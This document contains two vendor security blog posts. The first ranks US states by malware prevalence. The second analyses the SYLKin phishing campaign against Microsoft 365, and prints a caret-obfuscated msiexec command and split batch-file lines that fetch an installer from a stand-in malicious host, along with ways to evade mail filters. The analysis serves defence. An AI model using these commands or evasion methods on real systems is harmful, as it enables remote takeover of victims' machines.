And while dangers such as traffic accidents and property crime are more dynamic and complex, these issues are studied at length, with data released periodically on what areas have shown increases and decreases. In short, it’s easy to find out what sorts of dangers one might encounter in a given area in order to prepare accordingly.

While the damage from cybercrime isn’t as immediately visible as the damage from things like drought and flood, it still has the potential to be extremely devastating and costly. According to the FBI, cybercrime cost individuals and businesses a staggering $3.5 billion in 2019 alone.

To help organizations better assess their risks, SonicWall Capture Labs threat researchers continually monitor cybercrime and release the data collected in reports, such as the recently released mid-year update to the 2020 SonicWall Cyber Threat Report.

The threat research gathered during the first half of 2020 offers insight into not only what modes of attack criminals are using, but also what areas they’re targeting. While no city or state has a monopoly on (or immunity from) malware, there were some notable hotspots. From January to June, researchers identified 304.1 million malware attacks in California — more than 100 million more than in the next-highest state (New York.)

So that means businesses in California see a lot more malware, right? Not so fast. According to the Census Bureau’s Survey of Entrepreneurs, firms with fewer than 500 employees accounted for 99.7% of employer firms in the U.S. — and California has by far the largest number of such businesses (791,268 out of 6.4 million total for the entire U.S.).

Simply put, there’s a similarly massive number of endpoints, networks and sensors. In terms of states where any given person is most likely to encounter malware, California is actually tenth … from the bottom.

We call this phenomenon “malware spread.” Knowing the total malware is useful — it allows us to compare year-over-year trends for a given area. But it doesn’t tell us much about the odds a particular person will encounter malware.  For that, we need to calculate the malware spread, or the percentage of sensors in an area that saw a malware attack. The greater the malware spread percentage, the more widespread malware is in a given region.

It can be useful to think of malware totals vs. malware spread in terms of how we think about rain. Knowing the total rainfall for a defined area is useful, but it doesn’t tell us whether we’re likely to need an umbrella. For that, we need the Probability of Precipitation, or “chance of rain.” Like the malware spread percentage, this calculation takes into account a number of other factors to provide a more meaningful risk assessment.

To find the state with the highest malware spread, you’ll need to travel 1,523 miles east, to Kansas. Nearly a third of organizations there, or 31.3%, saw malware. (For comparison’s sake, fewer than a quarter of those in California — 24.1% — did.) Moreover, there’s a significantly higher risk of malware in Kansas than in the second-riskiest state, Montana. The percentage decrease between Kansas and Montana is greater than the percentage decrease between Montana and the ninth-riskiest state (Louisiana).

Using the same data set, we can also determine the least-risky states for malware. Here, North Dakota takes top honors — only 21.9% of organizations here saw malware. Georgia, Texas, Maine, New York, Arizona, Missouri, Alaska, Minnesota and California rounded out the list of top 10 safest states in terms of malware.

It’s tempting to try and find commonalities among the riskiest and least risky states, but it’s not likely to yield much more than frustration. For example, the list of riskiest states includes states in the heartland, but also Hawaii — the most coastal state there is. Three of the top five most populous states are on the “least risky” list, but so is Alaska, which is No. 48 — and Florida, the third-most populous, appears on the “riskiest” list. Similarly, each list includes both northern states and southern states, hot states and cold states, red states and blue states. The state malware rankings don’t even line up with the rankings for ransomware risk.

At first glance, this randomness might suggest there are no lessons that can be taken from this data. On the contrary: That is exactly the lesson. There is no “cybercrime capital.” There are no safe harbors. Anyone can be targeted by cybercrime, but the good news is that, with proper safeguards, compromise can be prevented.

Protect Against SYLKin Attack with SonicWall Cloud App Security

/0 Comments/in /by

With the definition of normal changing with each passing day, the ongoing pandemic has forced security professionals to re-evaluate new working models and how they can prevent attackers from targeting end users. Albert Einstein once said, “In the midst of every crisis lies great opportunity,” and this idea has formed the basis for how cybercriminals operate in the era of COVID-19.

Never ones to let an opportunity go to waste, cybercriminals are deploying new attacks each day. Microsoft was recently affected by a new SYLKIN Attack that bypasses both Microsoft 365 default security (EOP) and Microsoft advanced security (ATP). At the time of writing, Microsoft 365 is still vulnerable, and the attack is still being used extensively against Microsoft 365 customers.

Lately Avanan’s security analysts have detected a significant increase in the usage of SLK files in attacks against Microsoft 365 customers. In these attacks, hackers send an email with a .slk attachment that contains a malicious macro (msiexec script) to download and install a remote access trojan.

It is a very sophisticated attack with several obfuscation methods specifically designed to bypass Microsoft 365. Gmail customers, on other hand, are safe from this attack — Google already blocks it on incoming email and has made it impossible to send these SLK files as an attachment from a Gmail account.

What is SYLKin attack?

Again, SLK files are rare, so if you have received one in your inbox, chances are you are being targeted by the most recent Remote Access Trojan malware that has been ‘upgraded’ to bypass Microsoft ATP. The attack method itself has been extensively documented, so I’ll only explain it briefly. The focus will be on how such a well-understood attack bypassed Office 365 filters, including Microsoft ATP.

The attack specifically targets Microsoft 365 accounts and until recently, was isolated to a small number of organizations.

Emails are targeted and manually created

The attack emails are highly customized, using information and language that could only have been found and written manually. The messages seem to come from a partner or customer using a topic that is highly specific to the organization and the individual. For example, an email to a manufacturer will discuss parts specifications, an email to a tech firm will ask for changes to a large electronics order, or an email to a government department will discuss legal concerns. The subjects, contents and even the attached files are customized with the target’s name and organization. No two are alike. What they have in common is that the messages are realistic and compelling enough to convince a user to click on the attached SLK file.

What is a SLK file?

A so-called “Symbolic Link” (SLK) file is Microsoft’s human-readable, text-based spreadsheet format that saw its last update around the time that “Dallas” went off the air in 1986. At a time when XLS files were proprietary, SLK was an open-format alternative before XLSX was introduced in 2007. To the end user, a SLK file looks like an Excel document — but for an attacker,  it’s an easy way to bypass Microsoft 365 security, even for accounts protected with Microsoft ATP.

What does this attack do?

A recent version of the SYLK attack includes an SLK file with an obfuscated macro designed to run a command on a Windows machine:

msiexec /i http://malicious-site.com/install.php /q

This runs Windows Installer (msiexec) in quiet mode to install whatever MSI package they decide to host on their site. In this campaign, it’s a hacked version of the off-the-shelf NetSupport remote control application, granting the attacker full control over the desktop.

Windows grants more trust to SLK files than XLSX files

Because Windows “Protected View” does not apply to SLK files downloaded from the Internet or from email, Excel does not open them in read-only mode.

When opening an SLK file, the end user does not see this message:

Targeted methodology to bypass Microsoft Advanced Threat Protection

The first versions of the SLK attack method were seen in 2018 and were eventually blocked by Microsoft ATP. This new campaign, however, includes a number of obfuscation techniques specifically designed to bypass Microsoft ATP.

  • The attack was sent from hundreds of free hotmail accounts
  • The macro script includes ‘^’ characters to confuse ATP filters.
  • The URL was split in two so that ATP would not read it as a web link,
  • The hosting server became active after the email was sent so it seemed benign if sandboxed by ATP,
  • The hosting server only responded to “Windows Installer” user agents, ignoring other queries.

These methods are ATP-specific. Again, Gmail blocks these files and, in fact, makes it impossible to send from a Gmail account.

The attackers took advantage of a series of blind spots in the Microsoft email infrastructure to send this attack from thousands of disposable Hotmail accounts, with email addresses in the format “randomwords1982@hotmail.com,” each sending just a handful or messages at a time.

An important benefit of Hotmail to many attackers is that the same security filters are being used end to end. If the attacker is able to attach and send a file, it is likely that it will make it through the entire Microsoft security infrastructure. Should one of the accounts get flagged, Microsoft will disable it, informing the attacker that his messages are getting caught downstream.

While most of the well-known anonymous email-sending engines deserve their poor spam and phishing reputations, Hotmail users benefit from Microsoft’s own reputation. Since the service was merged with its own Outlook application, Microsoft seems to grant them a higher level of trust than external senders.

The macro script includes escape characters to confuse ATP filters

The attackers take advantage of the fact that ATP filters do not interpret text in the same way as the Windows command line. ATP would normally be able to identify the powerful and potentially malicious msiexec command, but the attackers inserted command-line escape characters ‘^’ to obfuscate the script.

msiexec /i http://malicious-site.com/install.php /q

becomes

M^s^ie^xec /ih^tt^p^:^/^/malicious-site.com/install.php ^/q

When read by Advanced Threat Protection filters, the msiexec command becomes unreadable and the telltale ‘http://’ is obscured.

When read by the desktop command line, the escape characters ‘disappear,’ running as if they were never there. This is just a command-line version of the Zero-Font methodologies that have plagued ATP for years.

The URL was split into two macros so that ATP would not read it as a link

ATP does not need to see the ‘http://’ to recognize a web link and would normally catch any text of the format ‘malicious-site.com.’ In order to hide the link, the attackers split it into two separate commands.

The first macro command creates a batch file with the first half of the URL.

Set /p=””M^s^ie^xec /ih^tt^p^:^/^/malicious-sit”” > JbfoT.bat

The second macro command adds the remainder of the URL and then runs the batch file.

Set /p=””e.com/install.php ^/q”” >> JbfoT.bat & JbfoT.bat

Within seconds, the malicious SLK file has run two simple commands to create a malicious install script and begin installing whatever software the attackers decide to host.

The hosting server was armed after the message was sent

We don’t believe Microsoft ATP is testing these files within their sandbox environment, relying instead on static filters. But we have found that other vendors have also failed to catch this attack, even when the code is executed in a virtual environment.

There is no special code or intelligence within the script to detect if it is running within emulation. Instead, the attackers do not enable the malicious web server until shortly after the email is sent. Because it cannot reach the server, the script fails, installing nothing.

In addition to enabling the URL only after delivery, the server would become inactive a few hours later, rejecting further queries. This seems to be a way to avoid action from their provider, as the reported content is no longer available at the links associated with the attack by the time a manual take-down notice is requested.

The coordinated timing of the hosting servers with the sending of the emails is characteristic of a more sophisticated campaign. When combined with the high-profile nature of the targeted organizations, it suggests an APT group or state actor.

The hosting server only responded to requests from “Windows Installer” agents

In addition to their on-and-off timing, the hosting servers utilized another common technique to avoid analysis, rejecting all queries except for those with User Agent: Windows Installer. This ensured that it only responded to the malicious script and would avoid detection by URL analysis tools.

How did it evade Microsoft protection?

Each of the obfuscation methodologies were designed to bypass a specific layer of the Microsoft 365 security infrastructure. While we understand how each was used in turn, we are still confused as to how ATP fails to detect this technique in emulation. Creating a batch file and calling the msiexec application is considered malicious, even if it fails to run. We must assume, then, that none of these files are being tested by the sandbox layer. Unfortunately, because each file is unique, no two attachments have the same MD5 hash, which requires each file to be given additional scrutiny.

Got SonicWall CAS protecting your inbox? Don’t worry, we have you protected.

If you have SonicWall Cloud App Security protecting your organization’s inbox and you are running in Protect (Inline) mode, this attack is blocked, and users will not see these attacks in their inbox. (If you are in Monitor Mode, we recommend that you move to Protect (Inline) mode.)

Alternatively, we recommend you configure your Office 365 account to reject files of this type. SLK files are relatively rare, so unless you have a legacy reason to allow them, we recommend excluding the SLK extension as a static mail-flow rule, at least until Microsoft fixes this gap.

Microsoft’s recommendations are much more complicated but are another alternative to protect the desktop.